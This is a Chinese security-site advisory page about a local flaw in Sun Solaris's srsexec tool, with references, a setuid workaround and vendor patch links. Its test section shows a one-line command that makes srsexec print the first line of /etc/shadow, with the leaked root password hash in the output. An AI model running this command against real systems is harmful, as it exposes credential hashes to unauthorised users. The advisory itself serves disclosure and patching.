Sun Solaris srsexec任意文件读取本地信息泄露漏洞 - 华夏黑客同盟

| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 |

服务导航

我要发布

主力频道

精华收集

光盘刻录

您现在的位置：华夏黑客同盟 >> 漏洞 >> 本地 >> 正文

用户登录

新用户注册

Sun Solaris srsexec任意文件读取本地信息泄露漏洞

★★★

【字体：小大】

Sun Solaris srsexec任意文件读取本地信息泄露漏洞

作者：不详文章来源：华夏收集点击数：更新时间：2007-5-16

影响版本:
Sun SRS Net Connect Software 3.2.4
Sun SRS Net Connect Software 3.2.3
详细说明:
Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。

Solaris系统的srsexec工具在处理文件访问权限时存在漏洞，本地攻击者可能利用此漏洞读取部分敏感文件内容。

如果安装了SUNWsrspx软件包的话，则该软件包中的srsexec工具可能允许本地攻击者访问敏感信息，如root口令哈希。漏洞起因是没有丢弃或检查目标文件的权限，如果用户指定了verify only模式（-v）及debug（-d）模式的话，且指定了受保护的文件（如/etc/shadow），srsexec就会在debug消息中显示/etc/shadow的第一行。

参考:
http://secunia.com/advisories/25194/
http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102891-1
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=531
解决方案:
临时解决方法：

* 删除srsexec二进制程序的setuid位：

# chmod -s /opt/SUNWsrspx/bin/srsexec

厂商补丁：

Sun
---
Sun已经为此发布了一个安全公告（Sun-Alert-102891）以及相应补丁:
Sun-Alert-102891：Security Vulnerability in Sun Remote Services (SRS) Net Connect Software
链接：http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102891-1

补丁下载：
http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-125713-01-1
http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-123870-02-1

测试方法:

[警告]

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!

$ /opt/SUNWsrspx/bin/srsexec -dvb /etc/shadow OWNED
  verify_binary(OWNED)
  srsexec: binary_name: OWNED
  srsexec: name_buf:    OWNED_______________
  binaries file line:   root:omhyabndnAtNw:6
  binaries file line:   :6445::::::
  smmsp:NP
  Security verification failed for binary: OWNED
  see SYSLOG(/var/adm/messages) for errors
//Sebug.net

责任编辑：杨勇　　联系方式　Email：杨勇

电话：51228163

上一篇漏洞： Sun Solaris ACE_SETACL本地拒绝服务漏洞

下一篇漏洞： notepad++[v4.1]

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新hack更新

最新推荐资讯

最新会员软件

最新推荐视频

最新推荐动画

mailto:webmaster@77169.net
咨询QQ号:836982 / 59280880
联系站长 QQ38588913